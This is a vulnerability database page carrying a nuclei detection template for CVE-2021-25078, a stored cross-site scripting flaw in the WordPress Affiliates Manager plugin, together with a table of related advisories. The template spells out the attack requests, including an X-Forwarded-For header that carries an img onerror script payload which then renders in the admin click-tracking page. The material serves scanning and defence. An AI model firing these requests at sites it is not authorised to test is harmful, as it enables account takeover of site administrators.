Lucene search
K

Affiliates Manager < 2.9.0 - Cross Site Scripting

🗓️ 12 Jul 2026 03:00:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Affiliates Manager < 2.9.0 - Cross Site Scripting vulnerability allows unauthenticated attackers to execute malicious scripts, impacting session hijacking and theft of sensitive information. Fixed in version 2.9.0

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-25078
27 Apr 202309:58
circl
CNNVD
WordPress plugin 跨站脚本漏洞
24 Jan 202200:00
cnnvd
CNVD
WordPress affiliate Manager WordPress plugin cross-site scripting vulnerability
26 Jan 202200:00
cnvd
CVE
CVE-2021-25078
24 Jan 202208:01
cve
Cvelist
CVE-2021-25078 Affiliates Manager < 2.9.0 - Unauthenticated Stored Cross-Site Scripting
24 Jan 202208:01
cvelist
EUVD
EUVD-2021-11990
7 Oct 202500:30
euvd
NVD
CVE-2021-25078
24 Jan 202208:15
nvd
OpenVAS
WordPress Affiliates Manager Plugin < 2.9.0 XSS Vulnerability
17 Feb 202300:00
openvas
OSV
CVE-2021-25078
24 Jan 202208:15
osv
Prion
Cross site scripting
24 Jan 202208:15
prion
Rows per page
id: CVE-2021-25078

info:
  name: Affiliates Manager < 2.9.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 2.9.0
  reference:
    - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25078
    - https://plugins.trac.wordpress.org/changeset/2648196
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25078
    cwe-id: CWE-79
    epss-score: 0.02288
    epss-percentile: 0.81165
    cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wpaffiliatemanager
    product: affiliates_manager
    framework: wordpress
  tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /?wpam_id=1 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: <img src onerror=alert(document.domain)>
      - |
        GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200 && status_code_3 == 200'
          - 'contains(header_3, "text/html")'
          - 'contains(body_3, "<img src onerror=alert(document.domain)>")'
          - 'contains(body_3, "Affiliates Manager Click Tracking")'
        condition: and
# digest: 4a0a00473045022100b18858cc3171eaad63f32d640476c3f8c5ea99660fd9d8cd92ff504fc9e2e80002206635e9f1fe926e379da2d9e1c84c97273a5644fb7451d6e39970ea79b2c8703c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.02288
28